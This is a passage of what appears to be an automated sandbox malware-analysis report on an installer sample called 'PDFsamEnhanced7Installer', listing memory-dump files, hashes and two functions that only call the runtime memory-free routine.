                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 3ff960c9f426b0b1d9642582b90f182e092f541f6df77c86b992ec3ac8139a4a
                                                                                                      • Instruction ID: ff67d04da439a315d581f8eaf380b862578e8213a970620e06e8fc83a012dd83
                                                                                                      • Opcode Fuzzy Hash: 3ff960c9f426b0b1d9642582b90f182e092f541f6df77c86b992ec3ac8139a4a
                                                                                                      • Instruction Fuzzy Hash: 72118471640B06B7EF21F774CC45FCB7B9C7F22710F484835A79AE6051E624B7164652
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      Function 0189E1A7, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • _free.LIBCMT ref: 0189E1BF
                                                                                                        • Part of subcall function 0189595F: RtlFreeHeap.NTDLL(00000000,00000000), ref: 01895975
                                                                                                        • Part of subcall function 0189595F: GetLastError.KERNEL32(?), ref: 01895987
                                                                                                      • _free.LIBCMT ref: 0189E1D1
                                                                                                      • _free.LIBCMT ref: 0189E1E3
                                                                                                      • _free.LIBCMT ref: 0189E1F5
                                                                                                      • _free.LIBCMT ref: 0189E207
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.931794723.0000000000FB1000.00000020.00020000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.931785275.0000000000FB0000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.955677238.000000000193A000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962154185.0000000001B2C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962248049.0000000001B31000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962435524.0000000001B3E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962596967.0000000001B46000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962673409.0000000001B47000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962785321.0000000001B4B000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962863082.0000000001B4C000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.962944829.0000000001B4D000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963037565.0000000001B4E000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963143862.0000000001B50000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963230327.0000000001B51000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.963316556.0000000001B52000.00000008.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964149780.0000000001B85000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964292785.0000000001B8A000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964425242.0000000001B91000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964530028.0000000001BA0000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964666113.0000000001BAB000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_fb0000_PDFsamEnhanced7Installer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                      • String ID:
                                                                                                      • API String ID: 776569668-0
                                                                                                      • Opcode ID: 4f31a499a085ef956d6f32915919a380097df7c1e43ea5cce802fbb05e3fb6e7
                                                                                                      • Instruction ID: a6acdcc484b8222b33233bfb4e02145f30fe3a70156d1d540dc27877c088b0ed
                                                                                                      • Opcode Fuzzy Hash: 4f31a499a085ef956d6f32915919a380097df7c1e43ea5cce802fbb05e3fb6e7
                                                                                                      • Instruction Fuzzy Hash: F1F04FB2504701ABEB21DA5CF484C6A7FD9BA0133176C480AF549D7540CB30FA814A90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%